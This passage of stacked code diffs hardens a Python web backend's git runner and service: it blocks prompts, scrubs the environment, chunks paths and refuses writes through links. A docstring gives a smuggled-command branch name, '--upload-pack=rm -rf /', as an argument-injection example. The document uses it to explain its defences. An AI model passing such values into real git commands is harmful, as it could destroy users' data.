+    endpoint is polled while the tab is open. One probe per interval is the
+    same bargain :func:`git_executable` strikes for a missing binary.
+
+    A missing git is the exception, and is deliberately NOT remembered here:
+    nothing was probed, and ``git_executable`` already has its own recheck
+    window for exactly that case.
     """
-    global _ssh_configured
+    global _ssh_configured, _ssh_probe_failed_at
 
     if _ssh_configured is not None:
         return _ssh_configured
+    now = time.monotonic()
+    if (_ssh_probe_failed_at is not None
+            and now - _ssh_probe_failed_at < MISSING_RECHECK_S):
+        return False
     try:
         result = _run(["config", "--get", "core.sshCommand"], cwd=_probe_cwd(),
                       timeout=SSH_PROBE_TIMEOUT_S, env=_base_git_env(),
                       ok_codes=(0, 1))
-    except GitError:
+    except GitError as exc:
+        if exc.code != "git_missing":
+            _ssh_probe_failed_at = now
         return False
     _ssh_configured = result.returncode == 0 and bool(result.out.strip())
     return _ssh_configured

--- a/backend/app/core/git/runner.py
+++ b/backend/app/core/git/runner.py
@@ -18,8 +18,11 @@ back to the command that caused it.
   ask for a password does not get an answer -- it gets a request that never
   returns and a worker that never comes back. :data:`NON_INTERACTIVE_ENV`
   plus ``-c core.askPass=`` turn every prompt into an immediate failure,
-  which the classifier then reports as ``auth_required``. ``GIT_EDITOR=:``
-  does the same for the editor a merge or a commit would otherwise open.
+  which the classifier then reports as ``auth_required``. That environment
+  also EMPTIES ``GIT_ASKPASS``, because the variable beats the config and
+  an inherited one would otherwise put a dialog on the server's own screen
+  (VS Code exports one into every terminal it opens). ``GIT_EDITOR=:`` does
+  the same for the editor a merge or a commit would otherwise open.
 * **Binary pipes.** Diff output is bytes: it carries the file's own CRLF
   line endings, and on a repository with mixed encodings it is not valid
   UTF-8 at all. ``text=True`` would rewrite the first and crash on the
@@ -96,7 +99,8 @@ GIT_PREFIX_ARGS: tuple[str, ...] = (
 #: The environment every call runs under.
 #:
 #: ``GIT_TERMINAL_PROMPT=0`` and ``GCM_INTERACTIVE=never`` make git and Git
-#: Credential Manager fail instead of asking; ``SSH_ASKPASS_REQUIRE=never``
+#: Credential Manager fail instead of asking; ``GIT_ASKPASS`` is set to the
+#: EMPTY STRING (not dropped -- see below); ``SSH_ASKPASS_REQUIRE=never``
 #: stops ssh reaching for a GUI passphrase prompt; ``GIT_EDITOR`` and
 #: ``GIT_SEQUENCE_EDITOR`` are ``:`` (the no-op command) so a merge commit
 #: message or a rebase todo is accepted as-is instead of opening an editor
@@ -104,9 +108,21 @@ GIT_PREFIX_ARGS: tuple[str, ...] = (
 #: ``GIT_ALLOW_PROTOCOL`` is an allowlist: it disables ``ext::`` -- the
 #: transport whose "URL" is a command line to run -- along with every other
 #: helper the validators do not accept.
+#:
+#: ``GIT_ASKPASS`` is EMPTIED rather than dropped, and it is not redundant
+#: with the ``-c core.askPass=`` in :data:`GIT_PREFIX_ARGS`: git reads the
+#: variable FIRST and never looks at the config when it is set, so an
+#: inherited one wins outright -- and VS Code exports one into every
+#: terminal it opens, which is where a developer starts this server. The
+#: value has to be the empty string because dropping it would let the next
+#: link in the chain answer instead; an empty one ends the chain there
+#: (``SSH_ASKPASS`` included) and the prompt becomes the immediate failure
+#: ``GIT_TERMINAL_PROMPT=0`` promises rather than a dialog on a screen
+#: nobody is watching, with the request hung until somebody clicks it.
 NON_INTERACTIVE_ENV: dict[str, str] = {
     "GIT_TERMINAL_PROMPT": "0",
     "GCM_INTERACTIVE": "never",
+    "GIT_ASKPASS": "",
     "SSH_ASKPASS_REQUIRE": "never",
     "GIT_EDITOR": ":",
     "GIT_SEQUENCE_EDITOR": ":",

--- a/backend/app/core/git/runner.py
+++ b/backend/app/core/git/runner.py
@@ -1,0 +1,420 @@
+"""The only place in the app that starts a git process.
+
+Everything the Source Control tab does ends up here, and it is one function
+on purpose: a second call site is a second chance to forget one of the five
+things below, and every one of them fails in a way that is hard to trace
+back to the command that caused it.
+
+* **Never a shell, and never user input as an option.** Every argument is a
+  list element, every path and ref is validated against a closed grammar in
+  ``paths.py``, and the caller puts them after ``--`` wherever git accepts
+  it. A branch called ``--upload-pack=rm -rf /`` is then a branch name that
+  does not exist, not a command.
+* **Never interactive.** A server has no terminal, so a git that decides to
+  ask for a password does not get an answer -- it gets a request that never
+  returns and a worker that never comes back. :data:`NON_INTERACTIVE_ENV`
+  plus ``-c core.askPass=`` turn every prompt into an immediate failure,
+  which the classifier then reports as ``auth_required``. ``GIT_EDITOR=:``
+  does the same for the editor a merge or a commit would otherwise open.
+* **Binary pipes.** Diff output is bytes: it carries the file's own CRLF
+  line endings, and on a repository with mixed encodings it is not valid
+  UTF-8 at all. ``text=True`` would rewrite the first and crash on the
+  second, so the pipes stay binary and decoding is
+  :attr:`GitResult.out` / :attr:`GitResult.err`'s job -- utf-8 with
+  ``errors="replace"``, which is what ``core/project.py`` has always done
+  for git output on a cp950 machine.
+* **A killable process tree.** ``creation_flags()`` gives the child its own
+  Windows process group so that a timeout can reach ``git`` AND the
+  ``ssh``/``curl`` it spawned; ``stop_process()`` is the same kill the
+  Package Center uses. A git that hangs on a network read holds an index
+  lock, so leaving one behind breaks the NEXT request too.
+* **An environment scrubbed of the caller's repository.** ``GIT_DIR`` and
+  its five friends (:data:`REPOSITORY_ENV_VARS`) name a repository; if the
+  server was started from a shell inside a git hook, every command here
+  would silently operate on THAT repository instead of the project. The
+  base is ``packs.runner.pip_env()``, which already drops the variables
+  that relocate a Python interpreter.
+
+``git_executable`` and ``git_version`` cache, and the shape of the caching
+is deliberate: a POSITIVE answer lasts for the life of the process (git does
+not move), a NEGATIVE one for :data:`MISSING_RECHECK_S` seconds, so a
+machine without git does not run ``shutil.which`` on every poll of the
+status endpoint -- and still notices an install a minute later without a
+restart. ``_reset_for_tests`` exists because that cache would otherwise make
+the second test in a file depend on the first.
+"""
+
+from __future__ import annotations
+
+import re
+import shutil
+import subprocess
+import tempfile
+import time
+from collections.abc import Container, Sequence
+from dataclasses import dataclass
+from pathlib import Path
+
+from ..packs.runner import creation_flags, pip_env, stop_process
+from .errors import GitError, classify_failure
+
+#: The options every call carries, between the executable and the caller's
+#: arguments (the ``-C <cwd>`` that precedes them is per call).
+#:
+#: ``core.quotepath=false`` stops git octal-escaping non-ASCII filenames, so
+#: a CJK path arrives as UTF-8 bytes rather than ``\346\226\207``.
+#: ``core.askPass=`` empties any askpass helper the user's config names --
+#: without it, a machine with Git Credential Manager configured pops a
+#: dialog on the SERVER and the request hangs until it is answered.
+#: ``color.ui=never`` keeps ANSI escapes out of output that is parsed.
+GIT_CONFIG_ARGS: tuple[str, ...] = (
+    "-c", "core.quotepath=false",
+    "-c", "core.askPass=",
+    "-c", "color.ui=never",
+)
+
+#: The environment every call runs under.
+#:
+#: ``GIT_TERMINAL_PROMPT=0`` and ``GCM_INTERACTIVE=never`` make git and Git
+#: Credential Manager fail instead of asking; ``SSH_ASKPASS_REQUIRE=never``
+#: stops ssh reaching for a GUI passphrase prompt; ``GIT_EDITOR`` and
+#: ``GIT_SEQUENCE_EDITOR`` are ``:`` (the no-op command) so a merge commit
+#: message or a rebase todo is accepted as-is instead of opening an editor
+#: nobody can see. ``LC_ALL=C`` pins the wording the classifier matches on.
+#: ``GIT_ALLOW_PROTOCOL`` is an allowlist: it disables ``ext::`` -- the
+#: transport whose "URL" is a command line to run -- along with every other
+#: helper the validators do not accept.
+NON_INTERACTIVE_ENV: dict[str, str] = {
+    "GIT_TERMINAL_PROMPT": "0",
+    "GCM_INTERACTIVE": "never",
+    "SSH_ASKPASS_REQUIRE": "never",
+    "GIT_EDITOR": ":",
+    "GIT_SEQUENCE_EDITOR": ":",
+    "LC_ALL": "C",
+    "GIT_ALLOW_PROTOCOL": "https:ssh:file",
+}
+
+#: Variables that tell git which repository to work on. Every one of them
+#: overrides the ``-C <cwd>`` this module passes, so an inherited value
+#: would move every command to another repository without changing a single
+#: argument. Dropped, never overwritten: an empty ``GIT_DIR`` is not the
+#: same thing as no ``GIT_DIR``.
+REPOSITORY_ENV_VARS: tuple[str, ...] = (
+    "GIT_DIR",
+    "GIT_WORK_TREE",
+    "GIT_INDEX_FILE",
+    "GIT_OBJECT_DIRECTORY",
+    "GIT_ALTERNATE_OBJECT_DIRECTORIES",
+    "GIT_NAMESPACE",
+)
+
+#: What we set ``GIT_SSH_COMMAND`` to when the user's setup has no opinion:
+#: batch mode turns ssh's passphrase and host-key questions into an
+#: immediate failure. Never applied over a value the user chose -- theirs
+#: may name a key, a jump host or a Windows OpenSSH binary that ours does
+#: not know about.
+DEFAULT_GIT_SSH_COMMAND = "ssh -oBatchMode=yes"
+
+#: How long a NEGATIVE answer about git is trusted. Long enough that a
+#: status poll does not re-scan PATH, short enough that installing git does
+#: not need a server restart.
+MISSING_RECHECK_S = 30.0
+
+#: ``git --version`` and the one-off ``core.sshCommand`` probe: both are
+#: local reads that touch no network, so anything past a couple of seconds
+#: means something is wrong rather than slow.
+VERSION_TIMEOUT_S = 5.0
+SSH_PROBE_TIMEOUT_S = 5.0
+
+#: How long a killed process gets to hand back its pipes.
+DRAIN_TIMEOUT_S = 3.0
+
+#: ``git version 2.53.0.windows.2`` -- the vendor suffix is deliberately not
+#: captured. Git for Windows and Apple's git both append their own build
+#: numbering, and a version check that tried to order those would be
+#: comparing two vendors' counters.
+_VERSION_RE = re.compile(r"git version (\d+)\.(\d+)(?:\.(\d+))?")
+
+# --- caches (see the module docstring) -------------------------------------
+
+_executable: str | None = None
+_missing_until: float | None = None
+_version: tuple[int, int, int] | None = None
+_version_probed_at: float | None = None
+_ssh_configured: bool | None = None
+
+
+def _reset_for_tests() -> None:
+    """Forget everything cached about the host's git.
+
+    Every cache in this module is process-wide, which is right for a server
+    and wrong for a test file: without this, whether ``git_version`` spawns
+    a process would depend on which test ran first.
+    """
+    global _executable, _missing_until, _version, _version_probed_at
+    global _ssh_configured
+    _executable = None
+    _missing_until = None
+    _version = None
+    _version_probed_at = None
+    _ssh_configured = None
+
+
+def git_executable() -> str | None:
+    """The host's ``git``, or None when there is none on PATH."""
+    global _executable, _missing_until
+
+    if _executable is not None:
+        return _executable
+    now = time.monotonic()
+    if _missing_until is not None and now < _missing_until:
+        return None
+    found = shutil.which("git")
+    if found is None:
+        _missing_until = now + MISSING_RECHECK_S
+        return None
+    _executable = found
+    return found
+
+
+def _probe_cwd() -> Path:
+    """A directory that exists, for the calls that are not about a repository.
+
+    ``git --version`` still goes through the fixed prefix, and ``-C`` needs
+    somewhere real to point at. The current directory normally is; a server
+    whose working directory has been deleted underneath it would otherwise
+    turn a version check into an ``OSError``.
+    """
+    try:
+        return Path.cwd()
+    except OSError:
+        return Path(tempfile.gettempdir())
+
+
+def git_version() -> tuple[int, int, int] | None:
+    """``(major, minor, patch)`` of the host's git, or None if it cannot be read.
+
+    Asked once and remembered: the answer cannot change while the process
+    runs, and the caller is a status endpoint the editor polls. A failure to
+    read it is remembered for :data:`MISSING_RECHECK_S` only, so a broken or
+    half-installed git does not become permanent.
+    """
+    global _version, _version_probed_at
+
+    if _version is not None:
+        return _version
+    now = time.monotonic()
+    if _version_probed_at is not None and now - _version_probed_at < MISSING_RECHECK_S:
+        return None
+    _version_probed_at = now
+
+    try:
+        # The base environment, not git_env(): a version check has no use
+        # for an ssh command, and probing for one from here would run a git
+        # process to find out how to run a git process.
+        result = _run(["--version"], cwd=_probe_cwd(), timeout=VERSION_TIMEOUT_S,
+                      env=_base_git_env())
+    except GitError:
+        return None
+    match = _VERSION_RE.search(result.out)
+    if match is None:
+        return None
+    major, minor, patch = match.group(1), match.group(2), match.group(3)
+    _version = (int(major), int(minor), int(patch or 0))
+    return _version
+
+
+def _base_git_env() -> dict[str, str]:
+    """The environment without the ``GIT_SSH_COMMAND`` decision.
+
+    Split out because the probe that makes that decision is itself a git
+    call: it runs with this, which is why asking "is core.sshCommand set?"
+    cannot recurse into asking it again.
+    """
+    env = pip_env()
+    for name in REPOSITORY_ENV_VARS:
+        env.pop(name, None)
+    env.update(NON_INTERACTIVE_ENV)
+    return env
+
+
+def _ssh_command_configured() -> bool:
+    """Has the user's git config already got a ``core.sshCommand``?
+
+    Asked at most once per process, and only when the environment does not
+    already answer it. The directory does not matter much -- a setting that
+    is meant to apply to the user's remotes lives in their global config --
+    so this deliberately does not need a repository to be open.
+
+    Any failure counts as "no": git missing, a timeout, a config file the
+    user cannot read. The consequence of guessing wrong here is one ssh run
+    in batch mode instead of theirs, which fails fast; the consequence of
+    raising would be that a config problem broke every git command.
+    """
+    global _ssh_configured
+
+    if _ssh_configured is not None:
+        return _ssh_configured
+    try:
+        result = _run(["config", "--get", "core.sshCommand"], cwd=_probe_cwd(),
+                      timeout=SSH_PROBE_TIMEOUT_S, env=_base_git_env(),
+                      ok_codes=(0, 1))
+    except GitError:
+        _ssh_configured = False
+        return False
+    _ssh_configured = result.returncode == 0 and bool(result.out.strip())
+    return _ssh_configured
+
+
+def git_env(*, read_only: bool = False) -> dict[str, str]:
+    """The environment every git process here runs under.
+
+    *read_only* adds ``GIT_OPTIONAL_LOCKS=0``, which is what lets a status
+    read run while the user has a merge tool open: git normally takes the
+    index lock to refresh its cache, and a status poll every two seconds
+    that fights a real operation for that lock is worse than a status that
+    is occasionally a little stale.
+    """
+    env = _base_git_env()
+    if not env.get("GIT_SSH_COMMAND") and not _ssh_command_configured():
+        env["GIT_SSH_COMMAND"] = DEFAULT_GIT_SSH_COMMAND
+    if read_only:
+        env["GIT_OPTIONAL_LOCKS"] = "0"
+    return env
+
+
+@dataclass
+class GitResult:
+    """One finished git command: what was run, and what it said.
+
+    ``stdout``/``stderr`` are BYTES (see the module docstring). ``out`` and
+    ``err`` are the decoded views, and every caller that wants text should
+    use them rather than decoding again with different options -- a
+    ``UnicodeDecodeError`` from a diff is a 500 for a file the user can see
+    on disk.
+    """
+
+    argv: list[str]
+    returncode: int
+    stdout: bytes
+    stderr: bytes
+
+    @property
+    def out(self) -> str:
+        """``stdout`` as text; undecodable bytes become U+FFFD."""
+        return self.stdout.decode("utf-8", errors="replace")
+
+    @property
+    def err(self) -> str:
+        """``stderr`` as text; undecodable bytes become U+FFFD."""
+        return self.stderr.decode("utf-8", errors="replace")
+
+
+def _argv(git: str, cwd: Path, args: Sequence[str]) -> list[str]:
+    """The full command line: executable, ``-C <cwd>``, fixed options, *args*.
+
+    *cwd* is resolved, so the ``-C`` git is handed is an absolute path with
+    no ``..`` in it even when the caller kept a relative one.
+    """
+    return [git, "-C", str(cwd.resolve()), *GIT_CONFIG_ARGS, *args]
+
+
+def _drain(proc: subprocess.Popen) -> None:
+    """Collect the pipes of a process that has just been killed.
+
+    Nothing here wants the output -- the point is to close the pipes and
+    reap the child, so a timeout does not leave a ``ResourceWarning`` and a
+    zombie behind. Every failure is a pipe that is already gone.
+    """
+    try:
+        proc.communicate(timeout=DRAIN_TIMEOUT_S)
+    except (subprocess.TimeoutExpired, OSError, ValueError):
+        pass
+
+
+def _run(args: Sequence[str], *, cwd: Path, timeout: float,
+         env: dict[str, str], input_bytes: bytes | None = None,
+         ok_codes: Container[int] = (0,)) -> GitResult:
+    """Run one git command with a PREBUILT environment.
+
+    Private because the environment is not the caller's business:
+    :func:`run_git` is the entry point, and the only reason this seam exists
+    is that building the environment can itself need a git call
+    (:func:`_ssh_command_configured`).
+    """
+    git = git_executable()
+    if git is None:
+        raise GitError("git_missing", 503,
+                       hint="install git and make sure it is on PATH")
+    argv = _argv(git, cwd, args)
+
+    try:
+        proc = subprocess.Popen(
+            argv,
+            # No ``cwd=``: ``-C`` already puts git in the right directory,
+            # and a cwd Popen cannot chdir into raises FileNotFoundError --
+            # which would be reported below as "git is not installed".
+            stdin=subprocess.PIPE if input_bytes is not None else subprocess.DEVNULL,
+            stdout=subprocess.PIPE,
+            stderr=subprocess.PIPE,
+            env=env,
+            creationflags=creation_flags(),
+        )
+    except FileNotFoundError:
+        raise GitError("git_missing", 503,
+                       hint="install git and make sure it is on PATH") from None
+    except OSError as exc:
+        # A git that cannot be executed at all -- a permission bit, a
+        # broken symlink on PATH. Structured, because an OSError escaping
+        # here is a traceback in the browser instead of an error message.
+        raise GitError("git_failed", 500, "git could not be started",
+                       stderr=str(exc)) from None
+
+    try:
+        stdout, stderr = proc.communicate(input_bytes, timeout=timeout)
+    except subprocess.TimeoutExpired:
+        # Kill the TREE: git's own children (ssh, curl, a credential
+        # helper) are what tend to be blocked, and they hold the index lock
+        # that the next request needs.
+        stop_process(proc)
+        _drain(proc)
+        raise GitError("timeout", 504,
+                       f"git took longer than {timeout:g}s and was stopped")
+
+    result = GitResult(argv=argv, returncode=proc.returncode,
+                       stdout=stdout or b"", stderr=stderr or b"")
+    if result.returncode not in ok_codes:
+        raise classify_failure(argv, result.returncode, result.err)
+    return result
+
+
+def run_git(args: Sequence[str], *, cwd: Path, timeout: float,
+            input_bytes: bytes | None = None,
+            ok_codes: Container[int] = (0,),
+            read_only: bool = False) -> GitResult:
+    """Run ``git <args>`` in *cwd* and return what it said.
+
+    *args* is everything after the fixed prefix -- the subcommand and its
+    options -- and the caller is responsible for putting validated paths and
+    refs after ``--``. *timeout* is in seconds and is not optional: every
+    command here can block on something (a lock, a network read, a hook),
+    and a request that never returns costs a worker.
+
+    *input_bytes* is written to stdin, which is how a commit message reaches
+    ``commit --file=-`` without ever being an argument. Without it stdin is
+    ``DEVNULL``, so a git that decides to read from it gets EOF rather than
+    waiting.
+
+    *ok_codes* are the return codes that are NOT failures for this command:
+    ``diff`` exits 1 to mean "there are differences" and ``config --get``
+    exits 1 to mean "unset". Anything outside it raises -- ``GitError`` with
+    a code from :func:`~app.core.git.errors.classify_failure`, or
+    ``git_missing`` / ``timeout`` for the two failures that have no stderr
+    to classify.
+
+    *read_only* marks a command that only reads, so it can run without
+    taking the index lock (see :func:`git_env`).
+    """
+    return _run(args, cwd=cwd, timeout=timeout,
+                env=git_env(read_only=read_only),
+                input_bytes=input_bytes, ok_codes=ok_codes)

--- a/backend/app/core/git/service.py
+++ b/backend/app/core/git/service.py
@@ -640,7 +640,8 @@ class GitService:
         """``user.name`` / ``user.email``, and where each comes from."""
         return await self._read(repo.read_identity)
 
-    async def log(self, *, skip: int = 0, limit: int = 20) -> LogResponse:
+    async def log(self, *, skip: int = 0,
+                  limit: int = log_ops.DEFAULT_LOG_LIMIT) -> LogResponse:
         """One page of history, newest first."""
         return await self._read(
             lambda root: log_ops.log(root, skip=skip, limit=limit))

--- a/backend/app/core/git/service.py
+++ b/backend/app/core/git/service.py
@@ -223,6 +223,13 @@ def check_ref_format(root: Path, name: str) -> str:
     ``validate_branch_name``) runs FIRST and is what stops that one; git
     then rejects what it alone knows about, with exit 1.
 
+    Every non-zero exit is the same answer. ``check-ref-format`` documents 1
+    for "not a valid ref name" and uses 128 for a call it could not make
+    sense of at all (a missing argument, an option it does not know), and
+    the second is still "git will not take this name" as far as a browser is
+    concerned -- reporting it as a 500 would be a server error for a
+    question the user asked wrongly.
+
     Nothing calls this yet. Branches are G3's; the check belongs with the
     service that will make them, and it is here now so that it is written
     once and tested against a real git rather than invented in a hurry
@@ -230,7 +237,7 @@ def check_ref_format(root: Path, name: str) -> str:
     """
     validate_branch_name(name)
     result = run_git(["check-ref-format", f"refs/heads/{name}"], cwd=root,
-                     timeout=T_STATUS, ok_codes=(0, 1), read_only=True)
+                     timeout=T_STATUS, ok_codes=(0, 1, 128), read_only=True)
     if result.returncode != 0:
         raise GitError("invalid_ref", 400, f"git will not accept {name!r} "
                                            f"as a branch name")

--- a/backend/app/core/git/service.py
+++ b/backend/app/core/git/service.py
@@ -474,8 +474,7 @@ def discard_paths(root: Path, paths: Sequence[str] | None = None
     if submodules:
         raise GitError("invalid_path", 400,
                        f"{submodules[0]} is a submodule",
-                       hint="submodules are not managed here; open that "
-                            "repository to discard its changes")
+                       hint=repo.SUBMODULE_HINT)
 
     status = repo.read_status(root)
     tracked = {entry.path for entry in status.unstaged}

--- a/backend/app/core/git/service.py
+++ b/backend/app/core/git/service.py
@@ -39,7 +39,7 @@ from __future__ import annotations
 
 import asyncio
 import os
-from collections.abc import Callable, Sequence
+from collections.abc import Callable, Iterable, Sequence
 from pathlib import Path
 from typing import Any, TypeVar
 
@@ -90,6 +90,12 @@ MIN_GIT_VERSION = (2, 23, 0)
 #: The states in which no git command can be run at all -- as opposed to
 #: ``not_repo``, which ``init`` exists to fix.
 _UNUSABLE_STATES = ("no_project", "git_missing", "git_too_old")
+
+#: How many paths one git process is given by the whole-tree writes, which
+#: name every file they touch (see :func:`_run_over`). Windows stops a
+#: command line at about 32,000 characters; 200 paths is a few kilobytes
+#: with room for the longest name anybody has.
+PATHS_PER_PROCESS = 200
 
 
 # --- the repository --------------------------------------------------------
@@ -257,7 +263,7 @@ def _selection(paths: Sequence[str] | None, all_paths: bool
 def _writable_paths(root: Path, paths: Sequence[str]) -> list[str]:
     """The paths of one write, validated and checked for a link in the way.
 
-    Every named path a mutation acts on goes through here, and nowhere else
+    Every NAMED path a mutation acts on goes through here, and nowhere else
     does: ``validate_rel_path`` allows a link (it must -- see
     ``repo.refuse_link_parents``), and a path whose PARENT is a link or a
     Windows junction resolves inside the project and passes every other
@@ -265,9 +271,15 @@ def _writable_paths(root: Path, paths: Sequence[str]) -> list[str]:
     theoretical: it is how ``discard`` once deleted the file a gitignored
     folder held.
 
-    The whole-tree form (``all``) does not come through here and does not
-    need to: git scopes ``-- .`` to the repository itself, and does not
-    follow a link out of it.
+    The whole-tree forms ask the same question through
+    :func:`_tree_selection`, and they have to: git DOES descend a junction.
+    Measured on Windows -- with ``proj/notes`` a junction to a folder
+    outside the project, ``git status`` lists the files under it as
+    untracked and ``git add -A -- .`` stages them into this repository,
+    which is the same write the per-path guard refuses. The destructive
+    half of ``discard`` is the exception and stays a whole-tree ``clean -fd
+    -- .``: git removes the LINK, never what it points at (measured, in
+    both the junction and the symlink shape).
     """
     clean = validate_rel_paths(root, paths)
     for path in clean:
@@ -275,17 +287,79 @@ def _writable_paths(root: Path, paths: Sequence[str]) -> list[str]:
     return clean
 
 
+def _tree_selection(root: Path, paths: Iterable[str]
+                    ) -> tuple[list[str], list[str]]:
+    """Split a whole-tree write into ``(what to do, what to leave alone)``.
+
+    The paths come from a fresh status -- git's own spelling of every file
+    it would touch -- and each of them meets the SAME guard a named path
+    does, because "all" is not a different kind of consent. Without it,
+    ``git add -A -- .`` staged files from outside the project through a
+    junction while ``stage(["notes/keys.txt"])`` was refused: the same
+    write, allowed or not depending on which button the user pressed.
+
+    A refused path is SKIPPED and reported, not fatal. One link in a
+    project must not make "stage everything" impossible, and the caller
+    puts the skipped list in ``detail`` so the tab can say what it left
+    alone rather than quietly doing less than it claimed.
+
+    Sorted and deduplicated: a file can be in two groups of one status
+    (``MM`` is staged and unstaged), and a stable order makes the argv --
+    and the skipped list the tab shows -- reproducible.
+    """
+    kept: list[str] = []
+    skipped: list[str] = []
+    for path in sorted(set(paths)):
+        if repo.link_parent_refusal(root, path) is None:
+            kept.append(path)
+        else:
+            skipped.append(path)
+    return kept, skipped
+
+
+def _run_over(root: Path, args: Sequence[str], paths: Sequence[str], *,
+              timeout: float) -> None:
+    """Run ``git <args> -- <paths>``, in chunks a command line can hold.
+
+    A working tree can hold more paths than Windows allows in one command
+    line (about 32,000 characters), and a whole-tree write names every one
+    of them. :data:`PATHS_PER_PROCESS` at a time is a few kilobytes per
+    process, which git spends longer working on than it costs to start.
+
+    An empty list runs NOTHING, which is the point rather than an edge
+    case: every command these arguments spell treats an absent pathspec as
+    "the whole tree", so "nothing to do" must never reach git as "do it
+    all".
+    """
+    for start in range(0, len(paths), PATHS_PER_PROCESS):
+        chunk = paths[start:start + PATHS_PER_PROCESS]
+        run_git([*args, "--", *chunk], cwd=root, timeout=timeout)
+
+
 def stage_paths(root: Path, paths: Sequence[str] | None = None
                 ) -> dict[str, Any]:
-    """Stage *paths*, or the whole tree when *paths* is None.
+    """Stage *paths*, or everything a fresh status names when *paths* is None.
 
     ``add -A`` for both forms, because "stage this file" has to include
     staging its DELETION -- a file the user deleted is a change like any
     other, and plain ``add`` would silently skip it.
+
+    The whole-tree form is the status's own three groups -- unstaged,
+    untracked and conflicted -- named one by one instead of ``.``, so that
+    a path reaching out of the project through a link is skipped and said
+    so (:func:`_tree_selection`). A conflicted path is in the list because
+    ``add`` is how a resolution is marked, which is what "Stage All" means
+    in the middle of a merge.
     """
     if paths is None:
-        run_git(["add", "-A", "--", "."], cwd=root, timeout=T_LOCAL)
-        return {"all": True}
+        status = repo.read_status(root)
+        kept, skipped = _tree_selection(
+            root, (entry.path
+                   for group in (status.unstaged, status.untracked,
+                                 status.conflicted)
+                   for entry in group))
+        _run_over(root, ["add", "-A"], kept, timeout=T_LOCAL)
+        return {"all": True, "skipped": skipped}
     clean = _writable_paths(root, paths)
     run_git(["add", "-A", "--", *clean], cwd=root, timeout=T_LOCAL)
     return {"paths": clean}
@@ -300,13 +374,22 @@ def unstage_paths(root: Path, paths: Sequence[str] | None = None
     HEAD yet, so the answer for a repository whose first commit has not
     happened is ``rm --cached`` -- remove it from the index, leave it on
     disk. Which state we are in is read, not guessed.
+
+    The whole-tree form names the staged files rather than running a bare
+    ``reset``, for the reason in :func:`_tree_selection`; the same list goes
+    to whichever of the two commands this repository's HEAD allows. A
+    conflicted path is NOT in it: it is not staged, and taking it out of
+    the index would throw away the three versions a merge tool needs.
     """
-    unborn = repo.read_status(root).unborn
+    status = repo.read_status(root)
+    unborn = status.unborn
     if paths is None:
-        args = (["rm", "--cached", "-r", "-q", "--", "."] if unborn
-                else ["reset", "-q"])
-        run_git(args, cwd=root, timeout=T_LOCAL)
-        return {"all": True}
+        kept, skipped = _tree_selection(
+            root, (entry.path for entry in status.staged))
+        args = (["rm", "--cached", "-r", "-q"] if unborn
+                else ["restore", "--staged"])
+        _run_over(root, args, kept, timeout=T_LOCAL)
+        return {"all": True, "skipped": skipped}
 
     clean = _writable_paths(root, paths)
     args = (["rm", "--cached", "-r", "-q", "--", *clean] if unborn
@@ -348,7 +431,11 @@ def discard_paths(root: Path, paths: Sequence[str] | None = None
     """
     if paths is None:
         # The whole-tree restore NAMES its files rather than passing ``.``,
-        # and both reasons are measured on git 2.53.
+        # and there are three reasons, all measured on git 2.53.
+        #
+        # A path that reaches its file through a link or a junction is
+        # skipped and reported, like the other two whole-tree writes -- see
+        # ``_tree_selection``.
         #
         # ``restore --worktree -- .`` exits 1 with "error: path 'a.txt' is
         # unmerged" as soon as one conflicted file sits beside an ordinary
@@ -363,12 +450,17 @@ def discard_paths(root: Path, paths: Sequence[str] | None = None
         # initialised -- and the clean would then never run. An empty list
         # skips the process instead of tolerating a failure it cannot tell
         # apart from a real one.
-        restore = [entry.path for entry in repo.read_status(root).unstaged]
-        if restore:
-            run_git(["restore", "--worktree", "--", *restore], cwd=root,
-                    timeout=T_LOCAL)
+        restore, skipped = _tree_selection(
+            root, (entry.path for entry in repo.read_status(root).unstaged))
+        _run_over(root, ["restore", "--worktree"], restore, timeout=T_LOCAL)
+        # The one whole-tree ``.`` that stays, because it is the safe half:
+        # ``clean -fd`` removes the LINK itself and never what it points at
+        # (measured, both shapes -- the junction went, the folder outside
+        # the project it pointed at was untouched). Naming the untracked
+        # files instead would leave every dangling link in place, which is
+        # not what "discard everything" means.
         run_git(["clean", "-fd", "--", "."], cwd=root, timeout=T_LOCAL)
-        return {"all": True}
+        return {"all": True, "skipped": skipped}
 
     clean = _writable_paths(root, paths)
     submodules = repo.submodule_paths(root, clean)

--- a/backend/app/core/git/service.py
+++ b/backend/app/core/git/service.py
@@ -338,7 +338,7 @@ def discard_paths(root: Path, paths: Sequence[str] | None = None
         return {"all": True}
 
     clean = validate_rel_paths(root, paths)
-    submodules = _submodule_paths(root, clean)
+    submodules = repo.submodule_paths(root, clean)
     if submodules:
         raise GitError("invalid_path", 400,
                        f"{submodules[0]} is a submodule",
@@ -366,30 +366,6 @@ def discard_paths(root: Path, paths: Sequence[str] | None = None
     if remove:
         run_git(["clean", "-f", "--", *remove], cwd=root, timeout=T_LOCAL)
     return {"paths": clean, "restored": len(restore), "removed": len(remove)}
-
-
-#: The index mode of a gitlink -- a submodule's entry in its parent.
-_GITLINK_MODE = "160000"
-
-
-def _submodule_paths(root: Path, paths: Sequence[str]) -> list[str]:
-    """Which of *paths* are submodules, as the index sees them.
-
-    Asked of ``ls-files --stage`` rather than of the status parser, which
-    does not keep porcelain v2's submodule field, and of the INDEX rather
-    than of the disk, because that is where the answer is unambiguous: mode
-    160000 is a gitlink and nothing else is.
-    """
-    result = run_git(["ls-files", "--stage", "-z", "--", *paths], cwd=root,
-                     timeout=T_READ, read_only=True)
-    found: list[str] = []
-    for entry in result.out.split("\x00"):
-        if not entry.startswith(_GITLINK_MODE + " "):
-            continue
-        _, _, path = entry.partition("\t")
-        if path:
-            found.append(path)
-    return found
 
 
 def commit_changes(root: Path, message: str, *, all_paths: bool = False,

--- a/backend/app/core/git/service.py
+++ b/backend/app/core/git/service.py
@@ -341,23 +341,31 @@ def discard_paths(root: Path, paths: Sequence[str] | None = None
       report a discard that did not happen; the changes are in the other
       repository, where this tab does not go.
 
-    The whole-tree form is ``restore --worktree -- .`` then ``clean -fd``,
-    and never ``-x``: ignored files are the user's ``.env``, their virtual
-    environment and their model weights, and "discard my changes" has never
-    meant "delete those".
+    The whole-tree form restores the unstaged files by NAME and then runs
+    ``clean -fd``, never ``-x``: ignored files are the user's ``.env``,
+    their virtual environment and their model weights, and "discard my
+    changes" has never meant "delete those".
     """
     if paths is None:
-        # ``restore --worktree -- .`` fails outright -- exit 1, "pathspec '.'
-        # did not match any file(s) known to git", which the classifier reads
-        # as a 404 -- when the INDEX is empty, and the index is empty in the
-        # most ordinary state there is: a repository somebody has just
-        # initialised. The clean would then never run at all. Nothing is
